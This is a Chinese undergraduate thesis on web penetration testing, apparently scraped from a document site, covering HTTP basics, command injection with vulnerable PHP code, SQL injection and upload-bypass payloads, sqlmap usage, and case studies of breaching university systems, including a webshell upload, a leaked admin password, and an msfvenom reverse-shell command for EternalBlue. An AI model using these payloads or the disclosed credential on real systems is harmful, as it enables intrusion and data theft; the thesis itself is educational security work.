ｅe(cuò)b安全安全滲透測(cè)試技術(shù)實(shí)踐

1、PAGE1院 系 學(xué)生學(xué)號(hào) 編 號(hào) 本科畢業(yè)設(shè)計(jì)題目 web安全滲透測(cè)試技術(shù)實(shí)踐 學(xué)生姓名 cui0 x01 專(zhuān)業(yè)名稱(chēng) 指導(dǎo)教師 2017年5月6日WEB安全滲透測(cè)試技術(shù)實(shí)踐摘要:隨著互聯(lián)網(wǎng)產(chǎn)業(yè)的高速發(fā)展，互聯(lián)網(wǎng)對(duì)人們生活的改變?cè)絹?lái)越大，人們?cè)谫?gòu)物時(shí)可以使用電子支付，政府在辦公時(shí)可以使用電子政務(wù)系統(tǒng)，大家在學(xué)習(xí)的時(shí)候可以看優(yōu)質(zhì)的網(wǎng)絡(luò)課程，當(dāng)然互聯(lián)網(wǎng)給人們帶來(lái)的便利不僅如此，現(xiàn)在，整個(gè)傳統(tǒng)行業(yè)都在網(wǎng)互聯(lián)網(wǎng)+靠近，誠(chéng)然，互聯(lián)網(wǎng)給傳統(tǒng)行業(yè)添加了活力。但網(wǎng)絡(luò)是把雙刃劍，在給人們帶來(lái)方便的同時(shí)也會(huì)帶來(lái)一些不利的影響，比如說(shuō)網(wǎng)絡(luò)信息問(wèn)題，一些不法分子通過(guò)入侵網(wǎng)絡(luò)上的web應(yīng)用系統(tǒng)，對(duì)個(gè)人造成信息泄露，對(duì)企

2、業(yè)造成商業(yè)機(jī)密泄露導(dǎo)致財(cái)產(chǎn)損失，對(duì)國(guó)家造成安全威脅。近幾年國(guó)家高度重視網(wǎng)絡(luò)安全，打擊網(wǎng)絡(luò)犯罪，此片文章介紹了web的組成和常見(jiàn)web漏洞原理，提高企業(yè)和個(gè)人警惕性，讓企業(yè)個(gè)人更好保護(hù)自己的財(cái)產(chǎn)和隱私，身為每位公民維護(hù)網(wǎng)絡(luò)世界的純凈和平每個(gè)人應(yīng)盡的義務(wù)和責(zé)任。關(guān)鍵詞：web安全；網(wǎng)絡(luò)安全；滲透測(cè)試Web security penetration testing technology practiceAbstract：With the rapid development of Internet, the Internet changes to peoples lives more and more

3、 big, people can use electronic payment when shopping, the government can use the electronic government affairs system in the office, you can see when learning quality of network curriculum, of course, the Internet bring convenience to people not only that, but now, the traditional industries in net

4、 Internet + near, admittedly, the Internet to the traditional industry has added vitality. But the network is a double-edged sword, in the network brings us convenience and at the same time, some criminals through the invasion of web application system on the network, for personal information, comme

5、rcial secrets to the enterprise has resulted in property damage, damage to national security threats. Country attaches great importance to the network security in recent years, crack down on Internet crime, this article introduces the composition of the web, and common web vulnerability principle, i

6、mprove the enterprise and individual vigilance, make enterprise people better protect the privacy of their own property and as each citizen to maintain the network world of purity and peace everyones duty and responsibility.Key words: Web Security; network security; penetration testing目錄 TOC o 1-3 h

7、 z u HYPERLINK l _Toc8 1緒論( PAGEREF _Toc8 h 1) HYPERLINK l _Toc9 研究背景及意義( PAGEREF _Toc9 h 1) HYPERLINK l _Toc0 WEB安全現(xiàn)狀( PAGEREF _Toc0 h 2) HYPERLINK l _Toc1 本文結(jié)構(gòu)( PAGEREF _Toc1 h 3) HYPERLINK l _Toc2 2 WEB滲透測(cè)試?yán)碚摶A(chǔ)( PAGEREF _Toc2 h 3) HYPERLINK l _Toc3 WEB應(yīng)用組成( PAGEREF _Toc3 h 3) HYPERLINK l _Toc4 客戶(hù)

8、端( PAGEREF _Toc4 h 3) HYPERLINK l _Toc5 服務(wù)端及數(shù)據(jù)庫(kù)( PAGEREF _Toc5 h 4) HYPERLINK l _Toc6 WEB服務(wù)器軟件及操作系統(tǒng)( PAGEREF _Toc6 h 5) HYPERLINK l _Toc7 HTTP協(xié)議簡(jiǎn)介( PAGEREF _Toc7 h 6) HYPERLINK l _Toc8 WEB應(yīng)用常見(jiàn)漏洞分析( PAGEREF _Toc8 h 8) HYPERLINK l _Toc9 代碼執(zhí)行和命令注入( PAGEREF _Toc9 h 8) HYPERLINK l _Toc0 SQL注入攻擊( PAGEREF

9、_Toc0 h 11) HYPERLINK l _Toc1 文件上傳( PAGEREF _Toc1 h 13) HYPERLINK l _Toc2 邏輯漏洞( PAGEREF _Toc2 h 19) HYPERLINK l _Toc3 3 WEB滲透測(cè)試常用工具( PAGEREF _Toc3 h 22) HYPERLINK l _Toc4 Firefox火狐瀏覽器( PAGEREF _Toc4 h 22) HYPERLINK l _Toc5 AWVS 網(wǎng)站掃描器( PAGEREF _Toc5 h 23) HYPERLINK l _Toc6 NMAP 掃描利器( PAGEREF _Toc6 h

10、24) HYPERLINK l _Toc7 Burpsuit 抓包利器( PAGEREF _Toc7 h 24) HYPERLINK l _Toc8 SQLMAP SQL漏洞利用神器( PAGEREF _Toc8 h 29) HYPERLINK l _Toc9 Hydra爆破利器( PAGEREF _Toc9 h 31) HYPERLINK l _Toc0 4 WEB滲透測(cè)試步驟設(shè)計(jì)( PAGEREF _Toc0 h 31) HYPERLINK l _Toc1 信息搜集( PAGEREF _Toc1 h 31) HYPERLINK l _Toc2 域名信息查詢(xún)( PAGEREF _Toc2 h

11、 31) HYPERLINK l _Toc3 查詢(xún)WEB服務(wù)器軟件和服務(wù)端腳本語(yǔ)言( PAGEREF _Toc3 h 32) HYPERLINK l _Toc4 操作系統(tǒng)指紋和開(kāi)放端口掃描( PAGEREF _Toc4 h 33) HYPERLINK l _Toc5 CMS模板識(shí)別和網(wǎng)站目錄結(jié)構(gòu)( PAGEREF _Toc5 h 35) HYPERLINK l _Toc6 旁站信息搜集( PAGEREF _Toc6 h 36) HYPERLINK l _Toc7 漏洞挖掘?qū)崙?zhàn)( PAGEREF _Toc7 h 37) HYPERLINK l _Toc8 某高校圖書(shū)管理系統(tǒng)存在注入( PAGER

12、EF _Toc8 h 37) HYPERLINK l _Toc9 某高校網(wǎng)站存在上傳漏洞( PAGEREF _Toc9 h 39) HYPERLINK l _Toc0 某高校網(wǎng)站存在敏感文件泄露( PAGEREF _Toc0 h 41) HYPERLINK l _Toc1 某高校網(wǎng)認(rèn)證服務(wù)器存在445端口漏洞( PAGEREF _Toc1 h 42) HYPERLINK l _Toc2 后滲透階段( PAGEREF _Toc2 h 44) HYPERLINK l _Toc3 滲透測(cè)試報(bào)告的撰寫(xiě)要求( PAGEREF _Toc3 h 44) HYPERLINK l _Toc4 5總結(jié)( PAGE

13、REF _Toc4 h 46) HYPERLINK l _Toc5 參考文獻(xiàn)( PAGEREF _Toc5 h 47) HYPERLINK l _Toc6 謝辭( PAGEREF _Toc6 h 48) HYPERLINK l _Toc7 附錄( PAGEREF _Toc7 h 49) HYPERLINK l _Toc8 附錄1web安全腦圖( PAGEREF _Toc8 h 49) HYPERLINK l _Toc9 附錄2常見(jiàn)web漏洞代碼( PAGEREF _Toc9 h 50)1緒論研究背景及意義隨著互聯(lián)網(wǎng)的發(fā)展，互聯(lián)網(wǎng)+給各行業(yè)帶來(lái)新的升級(jí)的同時(shí)，傳統(tǒng)行業(yè)的業(yè)務(wù)在往向互聯(lián)網(wǎng)上進(jìn)行遷移

14、【2】。隨著web應(yīng)用的普及，個(gè)人，企業(yè)及政府都有自己的web系統(tǒng)，同時(shí)電子商務(wù)，電子政務(wù)，電子支付等信息化的產(chǎn)物為大家?guī)?lái)非常大的便利。但凡事都是有利有弊的，在信息化帶來(lái)便利的同時(shí)，也存在潛在威脅，一些不法分子通過(guò)攻擊web應(yīng)用獲取非法利益，大量個(gè)人信息泄露，通過(guò)泄露的個(gè)人信息登錄支付寶，或銀行卡造成財(cái)產(chǎn)損失。企業(yè)的商業(yè)信息被盜走賣(mài)到競(jìng)爭(zhēng)對(duì)手手上，造成企業(yè)專(zhuān)利財(cái)產(chǎn)等損失。國(guó)家的機(jī)密文件泄露，會(huì)給國(guó)家造成不可估量的損失，嚴(yán)重危害國(guó)家安全。下表列舉近年來(lái)影響較大的安全事件。 表 安全事件事件造成影響“棱鏡門(mén)”事件斯諾登曝光的美國(guó)的監(jiān)控計(jì)劃3，對(duì)世界信息安全敲響警鐘。OpenSSL“心臟出血”20

15、14年最知名的安全漏洞“心臟出血”，黑客利用該漏洞可獲取全球近三成以https開(kāi)頭網(wǎng)址的用戶(hù)登錄帳號(hào)4。12306 數(shù)據(jù)泄露事件入侵者通過(guò)“撞庫(kù)”入侵，超過(guò) 13 萬(wàn)條用戶(hù)數(shù)據(jù)被泄露出去，對(duì)個(gè)人出行造成不便。圓通泄露客戶(hù)百萬(wàn)信息商業(yè)信不嚴(yán)重不安全，快遞行業(yè)信息泄密愈演愈烈。中國(guó)人壽近百萬(wàn)份保單信息泄露保單包含個(gè)人資料全面，泄露這些資料非常危險(xiǎn)。WEB滲透測(cè)試通過(guò)站在入侵者的立場(chǎng)，盡可能完整的發(fā)動(dòng)技術(shù)攻擊和手段對(duì)目標(biāo)應(yīng)用安全性做深入測(cè)試，發(fā)現(xiàn)目標(biāo)系統(tǒng)的最脆弱環(huán)節(jié)，能夠讓用戶(hù)直觀的看到當(dāng)前應(yīng)用的脆弱性、可能造成的影響、以及采取必要的防護(hù)措施。WEB安全現(xiàn)狀WEB安全作為網(wǎng)絡(luò)安全分支之一，近幾年來(lái)W

16、eb系統(tǒng)遭到入侵攻擊，數(shù)據(jù)泄密，頁(yè)面被篡改數(shù)量巨大。這些被盜數(shù)據(jù)或者機(jī)密文件對(duì)個(gè)人企業(yè)或者國(guó)家機(jī)構(gòu)造成很大的損失。由于近些幾年國(guó)家重視網(wǎng)絡(luò)安全，并且頒布相關(guān)法律，很少有學(xué)校開(kāi)相關(guān)課程，web安全工程師挺缺人，很多互聯(lián)網(wǎng)公司保護(hù)自己公司財(cái)產(chǎn)，自己都設(shè)有SRC（應(yīng)急響應(yīng)中心），在人員招聘上重金難聘，足以說(shuō)明目前web安全是一個(gè)很大缺口的市場(chǎng)，在未來(lái)的物聯(lián)網(wǎng)世界，物聯(lián)網(wǎng)安全很有前景。應(yīng)用漏洞的研究組織OWASP組織在2013年發(fā)布了web應(yīng)用前10大風(fēng)險(xiǎn)漏洞OWASP TOP10【10】，例舉了2010-2013年期間針對(duì)web攻擊頻率最高的十大攻擊方法。表 OWASP TOP 10-2013序號(hào)漏

17、洞名稱(chēng)A1注入A2失效的身份認(rèn)證和會(huì)話(huà)管理A3跨站腳本（XSS）A4不安全的直接對(duì)象引用A5安全配置錯(cuò)誤A6敏感信息泄漏A7功能級(jí)訪問(wèn)控制缺失A8跨站請(qǐng)求偽造 （CSRF）A9使用含有已知漏洞的組件A10未驗(yàn)證的重定向和轉(zhuǎn)發(fā)目前隨著國(guó)家高度重視網(wǎng)絡(luò)安全，在此巨大市場(chǎng)缺口的下，國(guó)內(nèi)安全公司如雨后春筍般拔地而起，原先一些攻擊者懼于現(xiàn)在的網(wǎng)絡(luò)安全法，現(xiàn)在已經(jīng)洗白從事安全維護(hù)工作，壯大了安全公司，隨著這個(gè)行業(yè)被認(rèn)可，商業(yè)化市場(chǎng)缺口推動(dòng)著安全公司對(duì)技術(shù)的追求。這里列舉了一些國(guó)內(nèi)常見(jiàn)的安全廠商和產(chǎn)品。表 國(guó)內(nèi)常見(jiàn)安全廠商和產(chǎn)品廠商名稱(chēng)產(chǎn)品名稱(chēng)360360主機(jī)衛(wèi)士知道創(chuàng)宇樂(lè)安全安全狗安全狗主機(jī)衛(wèi)士綠盟科技W

18、eb應(yīng)用防火墻深信服下一代防火墻啟明星辰WAF10000本文結(jié)構(gòu)第一章是緒論說(shuō)明了對(duì)滲透技術(shù)實(shí)踐的背景和意義，以及目前web安全的現(xiàn)狀。第二章是對(duì)web組成結(jié)構(gòu)的了解，先知道是什么東西，其次再對(duì)web方面的常見(jiàn)漏洞原理分析。第三章古人說(shuō)工欲善其事必先利其器，這張介紹了一些輔助工具，再手工滲透的時(shí)候借助工具可以提高效率。第四章是完整的web滲透流程，將零碎的知識(shí)串起來(lái)，從而達(dá)到一個(gè)層次的提升。第五章是一個(gè)實(shí)踐的項(xiàng)目，實(shí)踐是查驗(yàn)理論的獨(dú)一標(biāo)準(zhǔn)，通過(guò)實(shí)踐，可以大大提高自身的技術(shù)和興趣。2 web滲透測(cè)試?yán)碚摶A(chǔ) web應(yīng)用組成客戶(hù)端HTML語(yǔ)言簡(jiǎn)介HTML是這幾個(gè)（Hyper Text Mark-u

19、p Language ）英文首字母大寫(xiě)的縮寫(xiě)，用中文翻譯過(guò)來(lái)就是文本標(biāo)記語(yǔ)言，通常我們所說(shuō)上網(wǎng)沖浪中“沖浪”訪問(wèn)的頁(yè)面主要就是用這種語(yǔ)言寫(xiě)的。 HTML語(yǔ)言通?？梢员硎疚淖?、圖片、動(dòng)畫(huà)片、音樂(lè)、鏈接等。其組成部分主要由head、Body組成。CSS是Cascading Style Sheet，這三個(gè)英文首字母大寫(xiě)的縮寫(xiě)。中文翻譯為層疊樣式表。是用來(lái)增強(qiáng)網(wǎng)頁(yè)排版和網(wǎng)頁(yè)內(nèi)容優(yōu)化的一種語(yǔ)言。 可以這么說(shuō)，HTML的標(biāo)簽是定義網(wǎng)站頁(yè)面的內(nèi)容，CSS標(biāo)簽是控制網(wǎng)站頁(yè)面的內(nèi)容如何顯示。Javascript是一種瀏覽器端的腳本的言語(yǔ)，可以通過(guò)瀏覽器直接執(zhí)行，廣泛用于web前段。服務(wù)端及數(shù)據(jù)庫(kù)PHP語(yǔ)言簡(jiǎn)介P

20、HP是由Hypertext Preprocessor縮寫(xiě)而得到的，中文翻譯過(guò)來(lái)“超文本處理”是一種很優(yōu)秀的服務(wù)端腳本語(yǔ)言。很多大型網(wǎng)站，博客系統(tǒng)，購(gòu)物系統(tǒng)都是用php語(yǔ)言編寫(xiě)的，通常php+mysql+apche+liunx是非常好的組合。ASP/語(yǔ)言簡(jiǎn)介ASP（ActiveServerPages），其實(shí)是一套微軟開(kāi)發(fā)的服務(wù)器端腳本環(huán)境，是創(chuàng)建動(dòng)態(tài)網(wǎng)頁(yè)的一個(gè)很好的工具【5】，是ASP的升級(jí)版，不過(guò)比ASP更加優(yōu)秀，具有網(wǎng)站開(kāi)發(fā)的解決方案，包括驗(yàn)證身份，緩存網(wǎng)頁(yè)等。其部署和調(diào)試非常簡(jiǎn)單，通常和微軟出的web容器IIS在數(shù)據(jù)庫(kù)sql server搭配較好。JSP語(yǔ)言簡(jiǎn)介JSP是sun公司開(kāi)發(fā)的一種

21、動(dòng)態(tài)網(wǎng)頁(yè)技術(shù)，JSP是跨平臺(tái)的，他做出的應(yīng)用可以分別在類(lèi)unix和win平臺(tái)上跑起來(lái)。JSP的全稱(chēng)是Java Server Pages，是由HTML代碼和嵌入到其中的JAVA代碼組成的。MYSQL/SQL SERVER/ORCLE這三個(gè)都是關(guān)系型數(shù)據(jù)庫(kù)，其中MYSQL為開(kāi)源的數(shù)據(jù)庫(kù)，SQL SERVER是微軟研發(fā)出來(lái)的數(shù)據(jù)庫(kù)，ORCLE為甲骨文公司的數(shù)據(jù)庫(kù)。他們都是存儲(chǔ)數(shù)據(jù)的倉(cāng)庫(kù)，都可以建立數(shù)據(jù)庫(kù)，數(shù)據(jù)庫(kù)里面建立數(shù)據(jù)表，數(shù)據(jù)表里面有行和列，有不同的權(quán)限，可以操縱的數(shù)據(jù)庫(kù)不一樣。web服務(wù)器軟件及操作系統(tǒng)iiS 的全稱(chēng)是Internet Information Services，中文翻譯為互聯(lián)網(wǎng)

22、信息服務(wù)，主要是提供web服務(wù)，用于放置ASP，語(yǔ)言編寫(xiě)的腳本，為用戶(hù)提供網(wǎng)上沖浪服務(wù)，網(wǎng)上學(xué)習(xí)，購(gòu)物等。目前最新的版本是IIS8，IIS5和IIs6都有相應(yīng)的文件漏洞，配合文件上傳漏洞，對(duì)web安全的危害大，可導(dǎo)致直接拿下web站點(diǎn)，進(jìn)一步提權(quán)入侵操作系統(tǒng)，從而滲透到內(nèi)網(wǎng)。漏洞出現(xiàn)后微軟官方也出過(guò)相關(guān)補(bǔ)丁，建議升級(jí)最新的IIS組件。APCHEApacheHTTPServer（簡(jiǎn)稱(chēng)Apache）是Apache軟件基金會(huì)的一個(gè)開(kāi)放源代碼的網(wǎng)頁(yè)服務(wù)器，可以在大多數(shù)電腦操作系統(tǒng)中運(yùn)行，由于其跨平臺(tái)和安全性被廣泛使用【6】。NGINX屬于一款輕型web服務(wù)器軟件，占用內(nèi)存較小，性能較好，中國(guó)許多廠商都

23、使用使用nginx的站點(diǎn)有：百度（）、京東、新浪、騰訊、淘寶等。WINDOWS類(lèi)服務(wù)器操作系統(tǒng)Windows服務(wù)器是微軟公司研發(fā)出來(lái)的一款操作系統(tǒng)，服務(wù)器和我們平時(shí)用的windows操作系統(tǒng)差不多一樣，只是在某些服務(wù)功能上比普通的操作系統(tǒng)好點(diǎn)，在硬件資源上需要用的資源用以提供各種服務(wù)。LINUX類(lèi)操作系統(tǒng)也是操作系統(tǒng)的一種，它的最大的優(yōu)點(diǎn)就是提供源代碼開(kāi)放，可以使用很多免費(fèi)開(kāi)源軟件。大多數(shù)web容器都會(huì)部署在linux上面，因?yàn)閘iunx操作系統(tǒng)穩(wěn)定安全，占用硬件資源較小，企業(yè)用來(lái)花費(fèi)少，在此基礎(chǔ)上衍生出很多成功版本如redhat，ubuntu，centos非常成功。HTTP協(xié)議簡(jiǎn)介圖1 ht

24、tp請(qǐng)求和發(fā)送HTTP協(xié)議說(shuō)明HTTP是由HyperText Transfer Protocol這三個(gè)英文首字母大寫(xiě)縮寫(xiě)而得到的，這個(gè)協(xié)議是負(fù)責(zé)web客戶(hù)端和服務(wù)端通信，一般版本是，由美國(guó)人Ted Nelson發(fā)明的，他想發(fā)明一種處理計(jì)算機(jī)文本的方法，為HTTP協(xié)議發(fā)展奠定了基礎(chǔ)。HTTP請(qǐng)求結(jié)構(gòu)圖2 HTTP請(qǐng)求結(jié)構(gòu)圖 一個(gè)請(qǐng)求由四個(gè)部分組成：請(qǐng)求行、請(qǐng)求頭標(biāo)、空行和請(qǐng)求數(shù)據(jù)1.請(qǐng)求行：是由請(qǐng)求方法、請(qǐng)求URI和HTTP版本組成。例如：GET / HTTP/HTTP協(xié)議規(guī)定了8種請(qǐng)求的協(xié)議：GET請(qǐng)求是一個(gè)簡(jiǎn)單的請(qǐng)求方法；HEAD請(qǐng)求是與GET方法類(lèi)似，服務(wù)器那邊只返回狀態(tài)行和頭標(biāo)，不返回所

25、要請(qǐng)求的文檔；POST請(qǐng)求向服務(wù)器傳送數(shù)據(jù)流；PUT請(qǐng)求是服務(wù)器保存請(qǐng)求數(shù)據(jù)作為指定URI新內(nèi)容的請(qǐng)求；DELETE請(qǐng)求服務(wù)器請(qǐng)求刪除URI中命名的1資源請(qǐng)求的一種方式；OPTIONS請(qǐng)求是關(guān)于服務(wù)器支持的請(qǐng)求方法信息的請(qǐng)求；TRACE請(qǐng)求是Web服務(wù)器反饋Http請(qǐng)求和其頭標(biāo)的請(qǐng)求；CONNECT請(qǐng)求是已文檔化但當(dāng)前未實(shí)現(xiàn)的一個(gè)方法，預(yù)留做隧道處理。2.請(qǐng)求頭標(biāo)：由關(guān)鍵字和值對(duì)應(yīng)組成，每行一對(duì)，關(guān)鍵字和關(guān)鍵值之間用冒號(hào)分里開(kāi)，請(qǐng)求頭標(biāo)通知服務(wù)器有關(guān)于客戶(hù)端的功能和標(biāo)識(shí)，典型的請(qǐng)求頭標(biāo)有【7】：User-Agent是客戶(hù)端瀏覽器的標(biāo)識(shí)；Accept是客戶(hù)端可識(shí)別的內(nèi)容類(lèi)型列表；Content-

26、Length是附加到請(qǐng)求的數(shù)據(jù)字節(jié)數(shù)?？招校鹤詈笠粋€(gè)響應(yīng)頭標(biāo)之后是一個(gè)空行，發(fā)送回車(chē)符和退行，表明服務(wù)器以下不再有頭標(biāo)【8】。 4.請(qǐng)求數(shù)據(jù)：通過(guò)POST傳送數(shù)據(jù)，經(jīng)常使用的是Content-Length和Content-Type頭標(biāo)這兩種標(biāo)識(shí)。HTTP響應(yīng)結(jié)構(gòu)如下圖所示：圖3 HTTP響應(yīng)頭一個(gè)響應(yīng)由四個(gè)部分組成；狀態(tài)行、響應(yīng)頭標(biāo)、空行、響應(yīng)數(shù)據(jù)狀態(tài)行：響應(yīng)代碼和響應(yīng)描述和HTTP版本這三個(gè)標(biāo)記組成。HTTP版本：通告客戶(hù)端服務(wù)端能是別的版本。響應(yīng)代碼是3位的數(shù)字代碼，用來(lái)指示請(qǐng)求狀態(tài)（成功或者失敗）；響應(yīng)描述是解釋響應(yīng)代碼。例如：HTTP/ 200 OK：HTTP響應(yīng)碼由1xx：信息，收到

27、請(qǐng)求，表示繼續(xù)處理；2xx：成功，表示請(qǐng)求成功；3xx：重定向，重新修改請(qǐng)求的url；4xx：客戶(hù)端出現(xiàn)錯(cuò)誤。2.響應(yīng)頭標(biāo)是類(lèi)似與請(qǐng)求頭標(biāo)，里面包含服務(wù)的相關(guān)信息。3.空行是表明服務(wù)器以下不再有頭標(biāo)，最后一個(gè)響應(yīng)頭標(biāo)之后是一個(gè)空行，發(fā)送回車(chē)符和退行。4.響應(yīng)數(shù)據(jù)是html文檔相關(guān)的東西，本身需要接收的數(shù)據(jù)。web應(yīng)用常見(jiàn)漏洞分析代碼執(zhí)行和命令注入代碼執(zhí)行，就是在web服務(wù)軟件中任意執(zhí)行惡意破壞的代碼。命令注入，就是在可以在服務(wù)端執(zhí)行操作惡意系統(tǒng)的命令。這兩種情況都是由于代碼/命令過(guò)濾不嚴(yán)謹(jǐn)所致。代碼執(zhí)行漏洞服務(wù)端的代碼演示。 攻擊者可以通過(guò)如下Payload實(shí)施代碼注入：/arg=1;phpi

28、nfo() 圖4 代碼執(zhí)行演示命令注入的源代碼展示PHP語(yǔ)言提供了一些用來(lái)執(zhí)行外部應(yīng)用程序的函數(shù)，例如：exec()system(),passthru(),和shell_exec()等函數(shù)。 phpif( isset( $_POST submit ) ) $target = $_REQUEST ip ; if (stristr(php_uname(s), Windows NT) $cmd = shell_exec( ping . $target ); echo .$cmd.; else $cmd = shell_exec( ping -c 3 . $target ); echo .$cmd.;

29、 這段代碼中并未對(duì)ip這個(gè)參數(shù)進(jìn)行過(guò)濾，導(dǎo)致再輸入時(shí)可以輸入多個(gè)命令。圖5 命令注入1圖6命令注入2代碼執(zhí)行和命令注入防范思路。盡量不要使用系統(tǒng)命令執(zhí)行，在進(jìn)入執(zhí)行命令函數(shù)之前，變量一定要做好過(guò)濾，對(duì)敏感字符進(jìn)行轉(zhuǎn)義，在使用動(dòng)態(tài)函數(shù)之前，確保使用的函數(shù)是指定函數(shù)之一，對(duì)php語(yǔ)言來(lái)說(shuō)，不能完全控制的危險(xiǎn)函數(shù)最好不要使用。SQL注入攻擊SQL注入漏洞是一種常見(jiàn)的web安全漏洞，它的本質(zhì)原因是在和數(shù)據(jù)庫(kù)交互數(shù)據(jù)的時(shí)候，編程人員寫(xiě)的代碼過(guò)濾不嚴(yán)謹(jǐn)，攻擊者經(jīng)常利用這個(gè)問(wèn)題，可以訪問(wèn)或修改數(shù)據(jù)，或者利用潛在的數(shù)據(jù)庫(kù)漏洞進(jìn)行攻擊。SQL注入類(lèi)型可分為3種，數(shù)字型注入，搜索型注入，字符型注入。數(shù)字型注入：

30、and 1=1; select * from news where id=1 and 1=1 字符型注入： select * from news where chr=name; select * from news where chr=name and 1=1 搜索型注入：測(cè)試; select * from news where search like % 漢字 % ; select * from news where search like %漢字 % and %1%=%1%判斷注入點(diǎn)判斷條件：第一必須有參數(shù)，第二必須要有帶入數(shù)據(jù)庫(kù)查詢(xún)。例如： 可能存在注入。進(jìn)一步通過(guò)邏輯注入語(yǔ)句進(jìn)行判定結(jié)

31、果，一定要用邏輯判斷。 and 1=1 執(zhí)行語(yǔ)句select * from papers where id=1 and 2=2頁(yè)面返回顯示正常。 and 1=2; 執(zhí)行語(yǔ)句select * from papers where id=1 and 1=2頁(yè)面返回顯示不正常。圖7 正常頁(yè)面對(duì)比不正常頁(yè)面php+mysql手工注入演示（ union select user(),database() #）圖8 注入演示1php+mysql手工注入演示（ union select 1,2 #）圖9 注入演示2php+mysql手工注入演示（ union select user,password from

32、users #）圖10 注入演示3文件上傳 上傳檢測(cè)流程概述 圖11 上傳演示1文件上傳檢測(cè)方法通常一個(gè)文件以HTTP協(xié)議進(jìn)行上傳時(shí)，將以POST請(qǐng)求發(fā)送至web服務(wù)器，web服務(wù)器接收到請(qǐng)求并同意后，用戶(hù)與web服務(wù)器將建立連接，并傳輸dafa【9】。通常在文件上傳過(guò)程中會(huì)檢測(cè)下面紅顏色標(biāo)出來(lái)的代碼。圖12 上傳演示2A 客戶(hù)端對(duì)前端語(yǔ)言javascript 檢測(cè)(通常為檢測(cè)需要上傳的文件擴(kuò)展名)B 服務(wù)端對(duì)所上傳文件的MIME 類(lèi)型檢測(cè)(檢測(cè)Content-Type 內(nèi)容)C 服務(wù)端對(duì)所上傳文件的目錄路徑檢測(cè)(檢測(cè)跟path 參數(shù)相關(guān)的內(nèi)容)D 服務(wù)端對(duì)所上傳文件的文件擴(kuò)展名檢測(cè)(檢測(cè)跟文

33、件extension 相關(guān)的內(nèi)容)E 服務(wù)端對(duì)所上傳文件的文件內(nèi)容檢測(cè)(檢測(cè)內(nèi)容是否合法或含有惡意代碼)客戶(hù)端檢測(cè)繞過(guò)(javascript 檢測(cè))圖13 上傳演示3客戶(hù)端檢測(cè)主要是通過(guò)前端javascript腳本檢測(cè)文件的后綴是否為允許的格式。服務(wù)端檢測(cè)繞過(guò)(MIME 類(lèi)型檢測(cè))圖14 上傳演示4假如服務(wù)器端上的 代碼如下然后我們可以將request 包的Content-Type 修改POST / HTTP/TE: deflate,gzip;q=Connection: TE, closeHost: localhostUser-Agent: libwww-perl/Content-Type:

34、multipart/form-data; boundary=xYzZYContent-Length: 155-xYzZYContent-Disposition: form-data; name=userfile; filename=Content-Type: image/gif (原為Content-Type: text/plain)-sSxYzZY-收到服務(wù)器端返回來(lái)的應(yīng)答HTTP/ 200 OKDate: Thu, 31 May 2011 14:02:11 GMTServer: Content-Length: 59Connection: closeContent-Type: text/ht

35、mlFile is valid, and was successfully uploaded.可以看到我們成功繞過(guò)了服務(wù)端MIME 類(lèi)型檢測(cè)。像這種服務(wù)端檢測(cè)http 包的Content-Type 都可以用這種類(lèi)似的方法來(lái)繞過(guò)檢測(cè)。圖15 上傳演示5服務(wù)器檢測(cè)繞過(guò)(目錄路徑檢測(cè))圖16 上傳演示6目錄路徑檢測(cè)，一般就是檢測(cè)上傳的路徑是否合法，稍微有一些特殊一點(diǎn)的都沒(méi)有防御。比如比較新的fckeditor php python27 -r F:tools -p txtName -threads 1 -level 2 -risk 3 -random-agent -hex -v 3 SQLMAP顯示操

36、作系統(tǒng)為win2003或者XP，數(shù)據(jù)庫(kù)為ORACLE。圖47 確定注入漏洞最后從數(shù)據(jù)庫(kù)顯示來(lái)看涉及近2萬(wàn)多條學(xué)生的登陸賬號(hào)密碼，姓名專(zhuān)業(yè)及身份證號(hào)等。C:UsersAdminpython27 -r F:tools -p txtName -threads 1 -level 2 -risk 3 -random-agent -hex -v 3 -D ILAS -tables -count圖48 泄露信息內(nèi)容抽樣針對(duì)這個(gè)SQL注入漏洞，在登錄框服務(wù)端接收數(shù)據(jù)時(shí)對(duì)特殊字符例如單引號(hào)、雙引號(hào)等進(jìn)行轉(zhuǎn)義。某高校網(wǎng)站存在上傳漏洞一般情況下，直接上傳漏洞還是很難找見(jiàn)的，配合目錄遍歷，可以嘗試找特殊頁(yè)面上傳文件。

37、通過(guò)目錄遍歷發(fā)現(xiàn)該網(wǎng)站后臺(tái)地址。域名/WebSystems/圖 49上傳演示1有開(kāi)始對(duì)后臺(tái)目錄進(jìn)行遍歷發(fā)現(xiàn)，域名WebSystems/，該頁(yè)面泄露敏感信息。圖50 上傳演示2直接上傳webshell用菜刀連接。圖51上傳演示3菜刀連接webshell后服務(wù)器上的文件可以自行下載上傳，危害巨大。圖52 getshell針對(duì)這個(gè)問(wèn)題，這些目錄中包含了敏感內(nèi)容，請(qǐng)刪除這些目錄，或者正確設(shè)置權(quán)限，禁止用戶(hù)訪問(wèn)。某高校網(wǎng)站存在敏感文件泄露網(wǎng)站敏感信息泄露，也是個(gè)危害很大的問(wèn)題，有時(shí)嚴(yán)重泄露管理員賬號(hào)密碼。發(fā)現(xiàn)泄露數(shù)據(jù)庫(kù)頁(yè)面。圖53 信息泄露演示1查看數(shù)據(jù)庫(kù)語(yǔ)言看出管理員賬號(hào)密碼。圖54 信息泄露演示2通

38、過(guò)解密MD5值得出來(lái)后臺(tái)賬號(hào)和密碼分別為admin #hqsy$hqsy 登錄進(jìn)入后臺(tái)，控制后臺(tái)之后可以隨意發(fā)文章等。圖55 登錄后臺(tái)針對(duì)此問(wèn)題，加強(qiáng)對(duì)網(wǎng)站目錄權(quán)限加管理，禁止非法訪問(wèn)，在服務(wù)端接收http協(xié)議中校驗(yàn)x-forword是否來(lái)源于登錄頁(yè)面。某高校網(wǎng)認(rèn)證服務(wù)器存在445端口漏洞通過(guò)泄露的NSA武器庫(kù)中的eternalblue和DoublePulsar直接可以拿下服務(wù)器權(quán)限，生成一個(gè)帶有反彈的.dll文件。Msfvenom-pwindwos/x64/meterpreter/reverse_tcplhost=lport=12399-fdll圖56 生成文件先在kali上用metaspl

